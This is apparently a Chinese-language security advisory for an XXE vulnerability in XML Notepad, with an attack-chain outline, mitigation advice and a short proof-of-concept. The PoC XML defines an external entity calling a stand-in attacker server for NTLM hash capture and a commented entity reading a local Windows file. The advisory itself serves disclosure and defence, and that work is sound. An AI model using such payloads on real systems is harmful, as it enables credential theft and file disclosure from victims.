CVE-2026-34401 CVSS 6.5 中危

CVE-2026-34401 XML Notepad XXE漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34401

漏洞类型

XML外部实体注入 (XXE)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

XML Notepad

漏洞概述

XML Notepad是Windows平台上一款用于浏览和编辑XML文档的工具。在2.9.0.21版本之前，该软件默认未禁用DTD处理，导致外部实体被自动解析。攻击者可利用此特性构造恶意XML文件，诱导用户打开。解析过程中，程序会触发对外部资源的请求，可能导致本地敏感文件泄露，或通过SMB协议窃取用户的NTLM凭据。厂商已在2.9.0.21版本中修复了该问题。

技术细节

该漏洞属于XML外部实体注入（XXE）漏洞。由于XML Notepad未在解析器中安全配置安全处理选项或禁用外部实体，导致其能够处理包含恶意DOCTYPE声明的XML文件。攻击者可以定义SYSTEM实体指向攻击者控制的服务器（HTTP/SMB）。当受害者使用XML Notepad打开文件时，解析器会自动解析这些实体，发起出站请求。利用SMB协议时，Windows会尝试进行NTLM认证，攻击者通过搭建恶意SMB服务器可截获NTLMv1/v2 Hash。利用HTTP协议则可证明OOB（带外数据）数据泄露。此攻击需要用户交互，即受害者必须打开特制的XML文件。

攻击链分析

STEP 1

准备阶段

攻击者创建一个包含恶意DTD定义的XML文件，实体指向攻击者控制的外部服务器（HTTP或SMB）。

STEP 2

传递阶段

攻击者通过钓鱼邮件或其他方式将恶意XML文件发送给目标用户。

STEP 3

执行阶段

目标用户使用受影响版本的XML Notepad打开该XML文件。

STEP 4

利用阶段

XML Notepad解析文件时自动解析外部实体，向攻击者服务器发起请求，泄露本地文件内容或发送NTLM凭据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-34401: XXE leading to OOB/File Read -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!-- Example 1: Triggering an outbound HTTP/SMB request (e.g., for NTLM capture) -->
  <!ENTITY xxe SYSTEM "http://attacker-controlled-server.com/capture" >
  <!-- Example 2: Reading a local file (if supported by parser config) -->
  <!-- <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" > -->
]>
<foo>&xxe;</foo>

影响范围

XML Notepad < 2.9.0.21

防御指南

临时缓解措施

建议用户尽快安装官方发布的补丁更新。在未更新之前，应提高安全意识，不要轻易打开陌生人发送的XML文档。网络管理员可以配置防火墙，监控并阻断内部网络向外部非业务相关IP发起的SMB（445端口）或异常HTTP请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表